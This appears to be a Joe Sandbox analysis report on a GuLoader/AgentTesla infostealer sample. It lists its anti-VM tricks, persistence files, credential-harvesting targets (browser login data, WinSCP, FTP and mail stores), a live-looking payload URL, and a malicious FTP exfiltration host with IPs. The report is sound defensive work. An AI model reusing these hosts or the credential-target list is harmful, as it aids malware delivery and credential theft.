Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: rendel#U00e9s_1023200000000000305.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2172384343.000000000323D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3278956920.00000000017CD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2171267771.000000000074C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 3840, type: MEMORYSTR

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Code function: 0_2_6FC61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FC61BFF

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_6FC630C0 push eax; ret		0_2_6FC630EE
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357C3AD3 push ebx; retf		2_2_357C3ADA

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

File created: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Indbruddene.Obd	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Inagglutinability.fug	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\bingy.uda	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\molge.gos	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\overissued.rei	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\ramessid.gla	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\triaxiality.gen	Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	API/Special instruction interceptor: Address: 38F88DB
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	API/Special instruction interceptor: Address: 1E888DB

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	RDTSC instruction interceptor: First address: 3894E21 second address: 3894E21 instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA9550F3F46h 0x00000008 test edx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	RDTSC instruction interceptor: First address: 1E24E21 second address: 1E24E21 instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA955128EA6h 0x00000008 test edx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Memory allocated: 32AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Memory allocated: 32A30000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

API coverage: 1.3 %

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405D74
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_0040290B FindFirstFileW,	2_2_0040290B
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_0040699E FindFirstFileW,FindClose,	2_2_0040699E

Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002637000.00000004.00000020.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW?

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	API call chain: ExitProcess graph end node			graph_0-4505
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	API call chain: ExitProcess graph end node			graph_0-4286

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Code function: 0_2_6FC61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FC61BFF

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Process created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"

Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Queries volume information: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403640

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	226 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	2 Obfuscated Files or Information	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	22 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Virtualization/Sandbox Evasion	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rendel#U00e9s_1023200000000000305.exe	13%	ReversingLabs	Win32.Trojan.Generic
rendel#U00e9s_1023200000000000305.exe	100%	Avira	HEUR/AGEN.1338455

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.biny	0%	Avira URL Cloud	safe
http://ftp.carbognin.it	0%	Avira URL Cloud	safe
http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ftp.carbognin.it	86.107.36.93	true	true		unknown
akonnyuszerkezet.hu	185.33.55.26	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	rendel#U00e9s_1023200000000000305.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.biny	rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002674000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.carbognin.it	rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B3D000.00000004.00000800.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.33.55.26	akonnyuszerkezet.hu	Hungary		47381	SERVERGARDEN-ASServergardenKftHU	false
86.107.36.93	ftp.carbognin.it	Romania		6910	DIALTELECOMRO	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571444
Start date and time:	2024-12-09 11:50:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rendel#U00e9s_1023200000000000305.exe renamed because original name is a hash value
Original Sample Name:	rendels_1023200000000000305.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/9@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 148 Number of non-executed functions: 75
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: rendel#U00e9s_1023200000000000305.exe

Simulations

Behavior and APIs

Time	Type	Description
